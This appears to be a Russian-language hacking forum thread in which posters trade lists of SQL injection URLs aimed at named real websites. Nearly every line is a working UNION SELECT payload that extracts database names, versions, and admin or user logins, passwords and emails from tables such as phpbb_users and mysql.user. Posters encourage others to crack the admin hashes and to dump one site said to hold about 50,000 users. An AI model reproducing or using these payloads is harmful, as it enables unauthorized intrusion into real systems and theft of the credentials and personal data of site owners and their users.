SQL Инъекции

__http://www.jorin.ru/content.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

__http://www.westauto.ru/news.php?news=yes&newsid=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*

 

Смотрим имена таблиц:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Пароль и логин админа:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13+from+admin/*

 

Моя первая

http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*

 

mail.ru
http://corp.mail.ru/press.html?mode=-1+union+select+1,2,3,4,user()/*

 

http://www.flugzeugbilder.de/show.php?id=-588342+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

http://www.cybwarrior.com/download/show.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+forum/*

http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,Password,6,7,8+from+admin/*

http://www.a1k.it/downloads.php?cat=-9+union+select+1,concat(username,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1/*

http://www.davidyassky.com/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9/*

http://www.cut-up.com/news/issues.php?issue=-13+union+select+1,2,3,4,VERSION()/*

http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.davealbo.com/issues.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.lccp.org/issues.php?ID=-6+union+select+1,2,3,4,password,6,7,8+from+users/*

http://tell-me-more.org/issues.php?ID=-21+union+select+1,2,3,4,5,6,7,8/*

http://www.ekipirovka.ru/issues.php?id=-47+union+select+1,2,3/*

http://www.cmslaw.com/current-issues.php?id=-3+union+select+1,2,3,4,5,6,7/*

 

__http://www.runiga.com/ruso/home.php?pageid=190&id=-1+union+select+1,2,3,concat(login,char(58),email),5,6,7,8,9+from+users/*

 

http://www.mtas.ru/second.php?ID=15%20UNION%20SELECT%20null/*

http://www.flirtanica.ru/articles1.php?id=-1%20UNION%20SELECT%201,version(),3,4,user()/*

 

Code:

http://www.fullboost.com.au/news.php?newsId=-179%20union%20select%201,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,version(),9,10,11/*

 

Code:

http://www.pitermag.ru/labels.php?do=ViewBrand&id=-1+union+select+1,database(),3,4,5,6,7/*

если было, сорри

Code:

http://rpg.gameforums.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,0x3a),8,9,10,11,12,13+from+users+limit+1,1/*

там 50к юзеров вроде как, дерзайте




upd:

Code:

http://www.bonsk.ru/seminars.php?id=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17/*

Code:

http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15/*

сайты взаимосвязаны.. копаться не стал, т.к. ничего явного не нашел, а пинг до сайтов большой =\

15.22pm upd2:

Code:

http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18/*

копаться также не стал, убегаю

 

2n1†R0x
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,concat(username,char(58),user_password,char(58),user_email,char(58),user_icq),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users/* ну вот например таблица юзеров, можно админский хеш попробовать раcшивровать.

http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+members+limit+0,1/* и перебираем,пасс в чистом виде

 

)))

 

__http://www.herb4all.ru/index.php?group=1000+union+select+1,version(),3/*

__http://www.mp2.ru/?p_id=-1+union+select+1,version(),concat(database(),char(58),user())/*

__http://www.japanfish.ru/index.php?razdel=-1+union+select+1,2,3/*

 

Yahoo.Com​

 

_http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Надеюсь у кого нибудь получиться доломать до пасса админа =)

 

http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user+limit+45/*

user:root а дальше пасса чето не могу найти)))

 

http://www.corp-gov.ru/bd/index.php3?base_id=-1+union+select+1,version(),3,4,5/*

 

Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id..

Мдя, ничего не понимаю. При запросе

Code:

http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user

Сайт выдает принтабельной колонку 1. (html код =>
printer_friendly_without.php?id=111)

При запросе

Code:

http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user

Проявляется printer_friendly_without.php?id=root

Но при запросах

Code:

http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user

и

Code:

http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql.user

printer_friendly_without.php?id= остается пустым

 

aes...

 

делать нехер =\